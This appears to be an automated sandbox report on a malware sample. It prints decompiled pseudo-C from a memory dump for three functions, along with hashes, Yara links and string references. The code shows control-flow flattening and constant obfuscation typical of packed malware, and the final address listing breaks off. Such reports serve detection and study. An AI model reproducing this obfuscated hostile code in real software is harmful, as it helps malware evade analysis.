Instruction ID: fb51fc97df1bbc0cbbd79ed4235564eeb8eed67b28ab757a4d8e3eac5a1caf62
Opcode Fuzzy Hash: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
Instruction Fuzzy Hash: 019153714093419BD768CF61C98981FFBF1FBC9B58F404A1DF296862A0C3B68A158F47

Uniqueness

Uniqueness Score: -1.00%

Function 0025A0AF, Relevance: 9.0, Strings: 7, Instructions: 283
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0025A0AF(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t237;
				void* _t251;
				void* _t256;
				short _t257;
				void* _t258;
				void* _t262;
				signed int _t268;
				signed int _t269;
				void* _t271;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				intOrPtr _t319;
				signed int _t320;
				signed int _t323;
				signed int* _t325;
				void* _t327;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t237);
				_v8 = _v8 & 0x00000000;
				_t325 =  &(( &_v108)[4]);
				_v36 = 0x3ea4;
				_v36 = _v36 >> 7;
				_t271 = 0x1d995f52;
				_v36 = _v36 ^ 0x0000fd94;
				_v100 = 0xb5d8;
				_t313 = 0x12;
				_v100 = _v100 / _t313;
				_v100 = _v100 + 0xffffd667;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xffc12715;
				_v44 = 0xa7b5;
				_v44 = _v44 + 0x5ef4;
				_v44 = _v44 ^ 0x00014b95;
				_v48 = 0x9389;
				_v48 = _v48 + 0xb0ba;
				_v48 = _v48 ^ 0x000118ce;
				_v88 = 0x5fea;
				_t314 = 0x1c;
				_v88 = _v88 * 0x7c;
				_v88 = _v88 ^ 0x636ec63e;
				_v88 = _v88 ^ 0x63409d32;
				_v16 = 0x76ea;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x000ec3ec;
				_v20 = 0x91aa;
				_v20 = _v20 | 0x0edf39e6;
				_v20 = _v20 ^ 0x0edfdf8b;
				_v52 = 0xaa70;
				_v52 = _v52 + 0x8ed4;
				_v52 = _v52 ^ 0x00017b8d;
				_v104 = 0xa114;
				_v104 = _v104 >> 5;
				_v104 = _v104 << 0xc;
				_v104 = _v104 / _t314;
				_v104 = _v104 ^ 0x0002b555;
				_v108 = 0xd093;
				_v108 = _v108 << 0xa;
				_t315 = 0x69;
				_v108 = _v108 * 0x4a;
				_v108 = _v108 / _t315;
				_v108 = _v108 ^ 0x024bf4a9;
				_v80 = 0x5298;
				_v80 = _v80 | 0xf2bddfef;
				_v80 = _v80 ^ 0xf2bdee35;
				_v84 = 0xad61;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x5376a172;
				_v84 = _v84 ^ 0x535d9bb3;
				_v96 = 0xfad4;
				_v96 = _v96 + 0xc0fb;
				_t316 = 0x75;
				_v96 = _v96 / _t316;
				_t317 = 0x41;
				_t323 = _a8;
				_v96 = _v96 / _t317;
				_v96 = _v96 ^ 0x00007e63;
				_v40 = 0x6cc;
				_v40 = _v40 + 0x5321;
				_v40 = _v40 ^ 0x00002fe7;
				_v76 = 0xe38c;
				_v76 = _v76 + 0x66b4;
				_v76 = _v76 >> 5;
				_v76 = _v76 ^ 0x00001a53;
				_v68 = 0xaffd;
				_v68 = _v68 + 0x9b0e;
				_v68 = _v68 ^ 0x74692a2f;
				_v68 = _v68 ^ 0x74685d67;
				_v92 = 0xd493;
				_v92 = _v92 >> 5;
				_v92 = _v92 + 0xffffb819;
				_v92 = _v92 << 3;
				_v92 = _v92 ^ 0xfffdea97;
				_v32 = 0x61b7;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00001b97;
				_v72 = 0x8555;
				_v72 = _v72 >> 6;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x00005e98;
				_v64 = 0xfd5d;
				_v64 = _v64 ^ 0xfb760f92;
				_v64 = _v64 + 0xe44c;
				_v64 = _v64 ^ 0xfb77c0e2;
				_v24 = 0xfd78;
				_v24 = _v24 ^ 0x534e19f9;
				_v24 = _v24 ^ 0x534eb204;
				_v28 = 0xae38;
				_v28 = _v28 ^ 0x0fcca386;
				_v28 = _v28 ^ 0x0fcc33c1;
				_t268 = _a8;
				_v56 = 0x9a6f;
				_v56 = _v56 | 0xcfdc8d68;
				_v56 = _v56 ^ 0xf237fb5d;
				_v56 = _v56 ^ 0x3deb56e2;
				_v12 = 0xde50;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x0de56132;
				_v60 = 0x8399;
				_v60 = _v60 ^ 0x95508e48;
				_v60 = _v60 ^ 0xc724022f;
				_v60 = _v60 ^ 0x52742192;
				while(1) {
					L1:
					_t251 = 0x10ef006b;
					do {
						while(1) {
							L2:
							_t327 = _t271 - 0x1d995f52;
							if(_t327 > 0) {
								break;
							}
							if(_t327 == 0) {
								_t271 = 0x1679d154;
								continue;
							} else {
								if(_t271 == 0x829cfc0) {
									_t311 = _v8;
									if(_t311 != 0) {
										do {
											_t320 =  *((intOrPtr*)(_t311 + 0x220));
											E0024F536(_v56, _v12, _v60, _t311);
											_t311 = _t320;
										} while (_t320 != 0);
									}
								} else {
									if(_t271 == _t251) {
										_t312 = _v8;
										_t268 = 0;
										if(_t312 != 0) {
											do {
												E00246636(_t268 * 2 + _t323, _v80, _v84, _v96, _t312 + 0xc);
												_t256 = E00250ADC(_t312 + 0xc, _v40, _v76);
												_t325 =  &(_t325[4]);
												_t269 = _t268 + _t256;
												_t257 = 0x2c;
												 *((short*)(_t323 + _t269 * 2)) = _t257;
												_t268 = _t269 + 1;
												_t312 =  *((intOrPtr*)(_t312 + 0x220));
											} while (_t312 != 0);
											_t251 = 0x10ef006b;
										}
										_t319 = _v4;
										_t271 = 0x33a3af6e;
										_t310 = _a8;
										continue;
									} else {
										if(_t271 == 0x1679d154) {
											E00255A61( &_v8, E00258D1C, _v44, _v48, _v88);
											_t325 =  &(_t325[4]);
											_t271 = 0x20b4c829;
											while(1) {
												L1:
												_t251 = 0x10ef006b;
												goto L2;
											}
										} else {
											if(_t271 != 0x19514a0a) {
												goto L24;
											} else {
												_push(_t271);
												_push(_t271);
												_t323 = E00248736(_t319 + _t319);
												_t251 = 0x10ef006b;
												_t271 =  !=  ? 0x10ef006b : 0x829cfc0;
												continue;
											}
										}
									}
								}
							}
							L28:
							return 0 |  *_a8 != 0x00000000;
						}
						if(_t271 == 0x20b4c829) {
							_t309 = _v8;
							_t319 = 0;
							_v4 = 0;
							if(_t309 != 0) {
								do {
									_t258 = E00250ADC(_t309 + 0xc, _v16, _v20);
									_t309 =  *(_t309 + 0x220);
									_t319 = _t319 + 1 + _t258;
								} while (_t309 != 0);
								_v4 = _t319;
								_t251 = 0x10ef006b;
							}
							_t310 = _a8;
							_t271 = 0x19514a0a;
							goto L24;
						} else {
							if(_t271 == 0x2b3a1c97) {
								E0024F536(_v64, _v24, _v28, _t323);
								_t271 = 0x829cfc0;
								goto L1;
							} else {
								if(_t271 != 0x33a3af6e) {
									goto L24;
								} else {
									_t260 = _t310 + 4;
									 *(_t310 + 4) =  *(_t310 + 4) & 0x00000000;
									_t262 = E00255D1D(_v68, _v92, _v32, _v72, _t268 - 1, _t323, _v36, _t260);
									_t325 =  &(_t325[6]);
									 *_t310 = _t262;
									_t271 = 0x2b3a1c97;
									while(1) {
										L1:
										_t251 = 0x10ef006b;
										goto L2;
									}
								}
							}
						}
						goto L28;
						L24:
					} while (_t271 != 0x202e1177);
					goto L28;
				}
			}

0x0025a0bd
0x0025a0be
0x0025a0c5
0x0025a0c6
0x0025a0c7
0x0025a0cc
0x0025a0d4
0x0025a0d7
0x0025a0e1
0x0025a0e6
0x0025a0eb
0x0025a0f3
0x0025a101
0x0025a106
0x0025a10c
0x0025a114
0x0025a119
0x0025a121
0x0025a129
0x0025a131
0x0025a139
0x0025a141
0x0025a149
0x0025a151
0x0025a15e
0x0025a161
0x0025a165
0x0025a16d
0x0025a175
0x0025a17d
0x0025a182
0x0025a18a
0x0025a192
0x0025a19a
0x0025a1a2
0x0025a1aa
0x0025a1b2
0x0025a1ba
0x0025a1c2
0x0025a1c7
0x0025a1d4
0x0025a1d8
0x0025a1e0
0x0025a1e8
0x0025a1f2
0x0025a1f5
0x0025a201
0x0025a205
0x0025a20d
0x0025a215
0x0025a21d
0x0025a225
0x0025a22d
0x0025a232
0x0025a23a
0x0025a242
0x0025a24a
0x0025a256
0x0025a259
0x0025a265
0x0025a268
0x0025a26f
0x0025a273
0x0025a27b
0x0025a283
0x0025a28b
0x0025a293
0x0025a29b
0x0025a2a3
0x0025a2a8
0x0025a2b0
0x0025a2b8
0x0025a2c0
0x0025a2c8
0x0025a2d0
0x0025a2d8
0x0025a2dd
0x0025a2e5
0x0025a2ea
0x0025a2f2
0x0025a2fa
0x0025a2ff
0x0025a307
0x0025a30f
0x0025a314
0x0025a319
0x0025a321
0x0025a329
0x0025a331
0x0025a339
0x0025a341
0x0025a349
0x0025a351
0x0025a359
0x0025a361
0x0025a369
0x0025a371
0x0025a37c
0x0025a384
0x0025a38c
0x0025a394
0x0025a39c
0x0025a3a4
0x0025a3a9
0x0025a3b1
0x0025a3b9
0x0025a3c1
0x0025a3c9
0x0025a3d1
0x0025a3d1
0x0025a3d1
0x0025a3d6
0x0025a3d6
0x0025a3d6
0x0025a3d6
0x0025a3dc
0x00000000
0x00000000
0x0025a3e2
0x0025a4cb
0x00000000
0x0025a3e8
0x0025a3ee
0x0025a592
0x0025a598
0x0025a59a
0x0025a59a
0x0025a5ad
0x0025a5b2
0x0025a5b6
0x0025a59a
0x0025a3f4
0x0025a3f6
0x0025a462
0x0025a466
0x0025a46a
0x0025a46c
0x0025a485
0x0025a494
0x0025a499
0x0025a49c
0x0025a4a0
0x0025a4a1
0x0025a4a6
0x0025a4a7
0x0025a4ad
0x0025a4b1
0x0025a4b1
0x0025a4b6
0x0025a4ba
0x0025a4bf
0x00000000
0x0025a3f8
0x0025a3fe
0x0025a450
0x0025a455
0x0025a458
0x0025a3d1
0x0025a3d1
0x0025a3d1
0x00000000
0x0025a3d1
0x0025a400
0x0025a406
0x00000000
0x0025a40c
0x0025a418
0x0025a419
0x0025a423
0x0025a425
0x0025a432
0x00000000
0x0025a432
0x0025a406
0x0025a3fe
0x0025a3f6
0x0025a3ee
0x0025a5ba
0x0025a5cf
0x0025a5cf
0x0025a4db
0x0025a543
0x0025a547
0x0025a549
0x0025a54f
0x0025a551
0x0025a55c
0x0025a561
0x0025a568
0x0025a56b
0x0025a56f
0x0025a573
0x0025a573
0x0025a578
0x0025a57f
0x00000000
0x0025a4dd
0x0025a4e3
0x0025a532
0x0025a539
0x00000000
0x0025a4e5
0x0025a4eb
0x00000000
0x0025a4f1
0x0025a4f1
0x0025a4f4
0x0025a511
0x0025a516
0x0025a519
0x0025a51b
0x0025a3d1
0x0025a3d1
0x0025a3d1
0x00000000
0x0025a3d1
0x0025a3d1
0x0025a4eb
0x0025a4e3
0x00000000
0x0025a584
0x0025a584
0x00000000
0x0025a590

Strings

L, xrefs: 0025A331
/, xrefs: 0025A28B
2a, xrefs: 0025A3A9
c~, xrefs: 0025A273
g]ht, xrefs: 0025A2C8
V=, xrefs: 0025A394
_, xrefs: 0025A151

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 2a$L$c~$g]ht$/$V=$_
API String ID: 0-445983283
Opcode ID: f99550f65041150c070c87fc6ff9b04668c9cf282756a6e3190eabfe81e7539f
Instruction ID: d0205c39b58805d98b53327a12969c8457fda054a749410ad01e4452f9638825
Opcode Fuzzy Hash: f99550f65041150c070c87fc6ff9b04668c9cf282756a6e3190eabfe81e7539f
Instruction Fuzzy Hash: CFD174725187819FD368CF61C48A91BBBE1FBC4758F604A0CF996862A0D7B49919CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00257F1F, Relevance: 9.0, Strings: 7, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00257F1F(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t229;
				void* _t232;
				void* _t233;
				void* _t236;
				void* _t238;
				void* _t241;
				void* _t246;
				void* _t247;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t271;
				void* _t272;
				signed int* _t274;
				void* _t277;

				_t274 =  &_v104;
				_v16 = 0x432510;
				_v12 = 0x57033b;
				_v8 = 0x70a374;
				_t271 = 0;
				_t247 = __ecx;
				_v4 = 0;
				_t272 = 0x285a15;
				_v52 = 0x28a8;
				_v52 = _v52 << 0xb;
				_t249 = 0x64;
				_v52 = _v52 / _t249;
				_v52 = _v52 ^ 0x00032641;
				_v56 = 0x58c1;
				_v56 = _v56 ^ 0x08ae2152;
				_v56 = _v56 ^ 0xe42bbac7;
				_v56 = _v56 ^ 0xec85f018;
				_v60 = 0x32b9;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x4ab7c61f;
				_v60 = _v60 ^ 0x4ab7bf69;
				_v88 = 0xcc29;
				_v88 = _v88 << 7;
				_v88 = _v88 >> 0xe;
				_t250 = 0x27;
				_v88 = _v88 * 0x71;
				_v88 = _v88 ^ 0x00008073;
				_v28 = 0x82bf;
				_v28 = _v28 / _t250;
				_v28 = _v28 ^ 0x0000421a;
				_v80 = 0xde89;
				_v80 = _v80 | 0x25f7ab60;
				_v80 = _v80 + 0xffffb767;
				_v80 = _v80 ^ 0x25f7d2d5;
				_v84 = 0xb172;
				_v84 = _v84 | 0x58f01ffb;
				_v84 = _v84 ^ 0x6aa9a845;
				_v84 = _v84 | 0x8208c103;
				_v84 = _v84 ^ 0xb259d8d2;
				_v48 = 0xe27e;
				_v48 = _v48 | 0xfee9bf5f;
				_v48 = _v48 ^ 0xfee98d98;
				_v64 = 0x40d4;
				_v64 = _v64 + 0xfffff13c;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0x00321441;
				_v68 = 0x6862;
				_v68 = _v68 + 0x864e;
				_v68 = _v68 << 3;
				_v68 = _v68 ^ 0x0007582b;
				_v92 = 0x5758;
				_v92 = _v92 | 0xff7df76f;
				_t251 = 0x39;
				_v92 = _v92 / _t251;
				_v92 = _v92 ^ 0x047b2a85;
				_v96 = 0x40be;
				_v96 = _v96 | 0xd59932a3;
				_v96 = _v96 << 0xb;
				_v96 = _v96 * 0x52;
				_v96 = _v96 ^ 0x36096eff;
				_v72 = 0x18a0;
				_v72 = _v72 + 0x45e5;
				_v72 = _v72 + 0xffff9352;
				_v72 = _v72 ^ 0xffff81db;
				_v100 = 0x6e96;
				_v100 = _v100 * 0x3a;
				_v100 = _v100 << 0x10;
				_v100 = _v100 ^ 0x7246fe44;
				_v100 = _v100 ^ 0x7fbac885;
				_v104 = 0x65cf;
				_v104 = _v104 / _t251;
				_v104 = _v104 ^ 0xf75b4ca1;
				_t252 = 0x48;
				_v104 = _v104 / _t252;
				_v104 = _v104 ^ 0x036f7b06;
				_v76 = 0x2c53;
				_t253 = 0x57;
				_v76 = _v76 * 0x11;
				_v76 = _v76 ^ 0x6f057687;
				_v76 = _v76 ^ 0x6f07c581;
				_v24 = 0x7097;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x000060b2;
				_v36 = 0x9151;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x43d947ca;
				_v36 = _v36 ^ 0xd2881410;
				_v40 = 0x482c;
				_v40 = _v40 + 0xffffb888;
				_v40 = _v40 << 1;
				_v40 = _v40 ^ 0x00000914;
				_v44 = 0x389f;
				_v44 = _v44 * 0x76;
				_v44 = _v44 * 0x18;
				_v44 = _v44 ^ 0x02723fe4;
				_v32 = 0x2aa8;
				_v32 = _v32 * 0x38;
				_v32 = _v32 ^ 0x551469c6;
				_v32 = _v32 ^ 0x551d1a3f;
				_v20 = 0xfc56;
				_v20 = _v20 / _t253;
				_v20 = _v20 ^ 0x000001b5;
				goto L1;
				do {
					while(1) {
						L1:
						_t277 = _t272 - 0x17308d28;
						if(_t277 > 0) {
							break;
						}
						if(_t277 == 0) {
							_push(_t253);
							_t236 = E00257F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x2b65fd67;
							_t271 = _t271 + _t236;
							continue;
						} else {
							if(_t272 == 0x285a15) {
								_t272 = 0x27256339;
								continue;
							} else {
								if(_t272 == 0x30e9834) {
									_t253 = _v72;
									_t238 = E0024D64E(_t253, _v100, _v104, _t247 + 0x18, _v76);
									_t274 =  &(_t274[3]);
									_t272 = 0x1bffcccd;
									_t271 = _t271 + _t238;
									continue;
								} else {
									if(_t272 == 0x527ec93) {
										_push(_t253);
										_t241 = E00257F1B();
										_t274 =  &(_t274[1]);
										_t272 = 0x1cfcffb7;
										_t271 = _t271 + _t241;
										continue;
									} else {
										if(_t272 != 0x60183f8) {
											goto L21;
										} else {
											_push(_v32);
											_t271 = _t271 + E00257F1B();
										}
									}
								}
							}
						}
						L8:
						return _t271;
					}
					if(_t272 == 0x1bffcccd) {
						_t253 = _v24;
						_t229 = E0024D64E(_t253, _v36, _v40, _t247 + 0x20, _v44);
						_t274 =  &(_t274[3]);
						_t272 = 0x60183f8;
						_t271 = _t271 + _t229;
						goto L21;
					} else {
						if(_t272 == 0x1cfcffb7) {
							_push(_t253);
							_t232 = E00257F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x17308d28;
							_t271 = _t271 + _t232;
							goto L1;
						} else {
							if(_t272 == 0x27256339) {
								_t253 = _v52;
								_t233 = E0024D64E(_t253, _v56, _v60, _t247, _v88);
								_t274 =  &(_t274[3]);
								_t272 = 0x527ec93;
								_t271 = _t271 + _t233;
								goto L1;
							} else {
								if(_t272 != 0x2b65fd67) {
									goto L21;
								} else {
									_push(_t253);
									_t246 = E00257F1B();
									_t274 =  &(_t274[1]);
									_t272 = 0x30e9834;
									_t271 = _t271 + _t246;
									goto L1;
								}
							}
						}
					}
					goto L8;
					L21:
				} while (_t272 != 0x28759a70);
				goto L8;
			}

0x00257f1f
0x00257f22
0x00257f2c
0x00257f34
0x00257f40
0x00257f42
0x00257f44
0x00257f48
0x00257f4d
0x00257f55
0x00257f60
0x00257f65
0x00257f6b
0x00257f73
0x00257f7b
0x00257f83
0x00257f8b
0x00257f93
0x00257f9b
0x00257fa0
0x00257fa8
0x00257fb0
0x00257fb8
0x00257fbd
0x00257fc7
0x00257fca
0x00257fce
0x00257fd6
0x00257fe6
0x00257fea
0x00257ff2
0x00257ffa
0x00258002
0x0025800a
0x00258012
0x0025801a
0x00258022
0x0025802a
0x00258032
0x0025803a
0x00258042
0x0025804a
0x00258052
0x0025805a
0x00258062
0x00258067
0x0025806f
0x00258077
0x0025807f
0x00258084
0x0025808c
0x00258094
0x002580a0
0x002580a3
0x002580a7
0x002580af
0x002580b7
0x002580bf
0x002580c9
0x002580cd
0x002580d5
0x002580dd
0x002580e5
0x002580ed
0x002580f5
0x0025810b
0x0025810f
0x00258114
0x0025811c
0x00258124
0x00258134
0x00258138
0x00258144
0x00258149
0x0025814f
0x00258157
0x00258164
0x00258165
0x00258169
0x00258171
0x00258179
0x00258181
0x00258186
0x0025818e
0x00258196
0x0025819b
0x002581a3
0x002581ab
0x002581b3
0x002581bb
0x002581bf
0x002581c7
0x002581d4
0x002581dd
0x002581e1
0x002581e9
0x002581f6
0x002581fa
0x00258202
0x0025820a
0x00258218
0x0025821c
0x0025821c
0x00258224
0x00258224
0x00258224
0x00258224
0x00258226
0x00000000
0x00000000
0x0025822c
0x002582c7
0x002582c8
0x002582cd
0x002582d0
0x002582d5
0x00000000
0x00258232
0x00258238
0x002582b5
0x00000000
0x0025823a
0x00258240
0x0025829d
0x002582a1
0x002582a6
0x002582a9
0x002582ae
0x00000000
0x00258242
0x00258248
0x0025827b
0x0025827c
0x00258281
0x00258284
0x00258289
0x00000000
0x0025824a
0x00258250
0x00000000
0x00258256
0x0025825e
0x00258267
0x00258267
0x00258250
0x00258248
0x00258240
0x00258238
0x00258269
0x00258272
0x00258272
0x002582e2
0x00258368
0x0025836c
0x00258371
0x00258374
0x00258379
0x00000000
0x002582e4
0x002582ea
0x00258346
0x00258347
0x0025834c
0x0025834f
0x00258351
0x00000000
0x002582ec
0x002582f2
0x00258326
0x0025832a
0x0025832f
0x00258332
0x00258337
0x00000000
0x002582f4
0x002582fa
0x00000000
0x002582fc
0x00258304
0x00258305
0x0025830a
0x0025830d
0x00258312
0x00000000
0x00258312
0x002582fa
0x002582f2
0x002582ea
0x00000000
0x0025837b
0x0025837b
0x00000000

Strings

bh, xrefs: 0025806F
~, xrefs: 0025803A
9c%', xrefs: 002582B5
XW, xrefs: 0025808C
9c%', xrefs: 002582EC
,H, xrefs: 002581AB
S,, xrefs: 00258157

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ,H$9c%'$9c%'$S,$XW$bh$~
API String ID: 0-4263808623
Opcode ID: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
Instruction ID: d4bd8fcfe51617f1bc2d6f153f00243310daa2929fe4ced41685a7e444f9d3e0
Opcode Fuzzy Hash: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
Instruction Fuzzy Hash: B7B154B29183819FD358CF25D98940BFBE1BBC4744F00891DF986A6260DBB5DA09CF47

Uniqueness

Uniqueness Score: -1.00%

Function 002469A0, Relevance: 9.0, Strings: 7, Instructions: 215
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002469A0(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* __edi;
				void* __ebp;
				void* _t182;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr* _t193;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t199;
				void* _t218;
				intOrPtr _t222;
				void* _t223;
				intOrPtr _t227;
				signed int* _t228;

				_t228 =  &_v84;
				_v8 = 0x71163c;
				_t222 = 0;
				_t193 = __edx;
				_v4 = 0;
				_v44 = 0xc562;
				_t227 = __ecx;
				_v44 = _v44 >> 2;
				_t223 = 0xa9ba57f;
				_v44 = _v44 ^ 0x8749252f;
				_v44 = _v44 ^ 0x87491d9f;
				_v16 = 0x2187;
				_v16 = _v16 + 0x9003;
				_v16 = _v16 ^ 0x00009583;
				_v64 = 0x884c;
				_v64 = _v64 ^ 0x157bb051;
				_t195 = 0x5b;
				_v64 = _v64 / _t195;
				_v64 = _v64 + 0xffffc6fd;
				_v64 = _v64 ^ 0x003c6beb;
				_v76 = 0xc2af;
				_t196 = 0x62;
				_v76 = _v76 / _t196;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0xffffe747;
				_v76 = _v76 ^ 0x000fbc5b;
				_v20 = 0xd86f;
				_v20 = _v20 << 0xb;
				_v20 = _v20 ^ 0x06c32379;
				_v24 = 0x5847;
				_v24 = _v24 ^ 0xbe016602;
				_v24 = _v24 ^ 0xbe0159ab;
				_v56 = 0x8b9e;
				_v56 = _v56 << 8;
				_v56 = _v56 ^ 0x62eb1469;
				_v56 = _v56 ^ 0x62609790;
				_v60 = 0xc8f5;
				_v60 = _v60 | 0xe944ef36;
				_v60 = _v60 ^ 0xbc6be2e2;
				_v60 = _v60 ^ 0x552f2627;
				_v84 = 0x43ed;
				_v84 = _v84 ^ 0x08a0b069;
				_v84 = _v84 | 0x0c951c83;
				_v84 = _v84 + 0x562e;
				_v84 = _v84 ^ 0x0cb6752c;
				_v48 = 0x4b81;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 + 0xffff2892;
				_v48 = _v48 ^ 0xffff31fe;
				_v80 = 0x3016;
				_v80 = _v80 + 0x7dde;
				_v80 = _v80 << 0xf;
				_t197 = 0x36;
				_v80 = _v80 / _t197;
				_v80 = _v80 ^ 0x019c7f33;
				_v52 = 0xfd2;
				_v52 = _v52 + 0xffff2d18;
				_v52 = _v52 + 0x6a3f;
				_v52 = _v52 ^ 0xffffabb5;
				_v28 = 0xa77b;
				_v28 = _v28 ^ 0xae749dbd;
				_v28 = _v28 ^ 0xae743f32;
				_v32 = 0xf75f;
				_v32 = _v32 | 0x58371397;
				_v32 = _v32 ^ 0x5837ee79;
				_v68 = 0x3d22;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 << 0xf;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x00007889;
				_v72 = 0xcbcf;
				_v72 = _v72 | 0x3a65856e;
				_v72 = _v72 + 0xdb4;
				_v72 = _v72 | 0x1789f940;
				_v72 = _v72 ^ 0x3feda3a8;
				_v36 = 0x2389;
				_v36 = _v36 * 0x4b;
				_v36 = _v36 | 0x61940fa3;
				_v36 = _v36 ^ 0x619e1b1f;
				_v40 = 0xa903;
				_v40 = _v40 + 0x4cf2;
				_v40 = _v40 | 0xc82713d6;
				_v40 = _v40 ^ 0xc827b671;
				_v12 = 0xc1c;
				_v12 = _v12 ^ 0x8bcf36f0;
				_v12 = _v12 ^ 0x8bcf5121;
				while(1) {
					L1:
					_t198 = 0x374e1c43;
					_t182 = 0x15aea868;
					L2:
					while(1) {
						do {
							if(_t223 == 0xa9ba57f) {
								_push(_t198);
								_push(_t198);
								_t199 = 0x38;
								_t222 = E00248736(_t199);
								__eflags = _t222;
								if(__eflags == 0) {
									_t223 = 0x3a1f14a3;
									_t182 = 0x15aea868;
									_t198 = 0x374e1c43;
									_t218 = 0x28fd42b4;
									goto L19;
								}
								_t223 = 0x2094e6da;
								L15:
								_t182 = 0x15aea868;
								L11:
								_t198 = 0x374e1c43;
								L12:
								_t218 = 0x28fd42b4;
								continue;
							}
							if(_t223 == 0xb1cacb5) {
								return E0024F536(_v36, _v40, _v12, _t222);
							}
							if(_t223 == _t182) {
								 *((intOrPtr*)(_t222 + 0x24)) = _t227;
								_t188 =  *0x25ca24; // 0x0
								 *((intOrPtr*)(_t222 + 0x2c)) = _t188;
								 *0x25ca24 = _t222;
								return _t188;
							}
							if(_t223 == 0x16c9d000) {
								E0025422C(_v68,  *((intOrPtr*)(_t222 + 0x28)), _v72);
								_t223 = 0xb1cacb5;
								goto L15;
							}
							if(_t223 == 0x2094e6da) {
								_push(_v24);
								_t190 = E00256DB9( *((intOrPtr*)(_t193 + 4)), _t222, _t227, __eflags, _t198,  *_t193, _v76, _v20);
								_t228 =  &(_t228[5]);
								 *((intOrPtr*)(_t222 + 0x28)) = _t190;
								__eflags = _t190;
								_t198 = 0x374e1c43;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x374e1c43 : 0xb1cacb5;
								goto L12;
							}
							if(_t223 == _t218) {
								_push(_t198);
								_t191 = E00241132(_v48, _t198, _v80, _t198, _t222, _v52, _v28, _v32, E00259586);
								_t228 =  &(_t228[9]);
								 *((intOrPtr*)(_t222 + 0x1c)) = _t191;
								__eflags = _t191;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x15aea868 : 0x16c9d000;
								goto L11;
							}
							if(_t223 != _t198) {
								goto L19;
							}
							_t192 = E002476DB( *((intOrPtr*)(_t222 + 0x28)), _v56, _v60, _v84);
							_t228 =  &(_t228[2]);
							 *((intOrPtr*)(_t222 + 4)) = _t192;
							_t218 = 0x28fd42b4;
							_t223 =  !=  ? 0x28fd42b4 : 0x16c9d000;
							goto L1;
							L19:
							__eflags = _t223 - 0x3a1f14a3;
						} while (__eflags != 0);
						return _t182;
					}
				}
			}

0x002469a0
0x002469a3
0x002469af
0x002469b1
0x002469b3
0x002469b9
0x002469c1
0x002469c3
0x002469c8
0x002469cd
0x002469d5
0x002469dd
0x002469e5
0x002469ed
0x002469f5
0x002469fd
0x00246a0b
0x00246a10
0x00246a16
0x00246a1e
0x00246a26
0x00246a32
0x00246a37
0x00246a3d
0x00246a42
0x00246a4a
0x00246a52
0x00246a5a
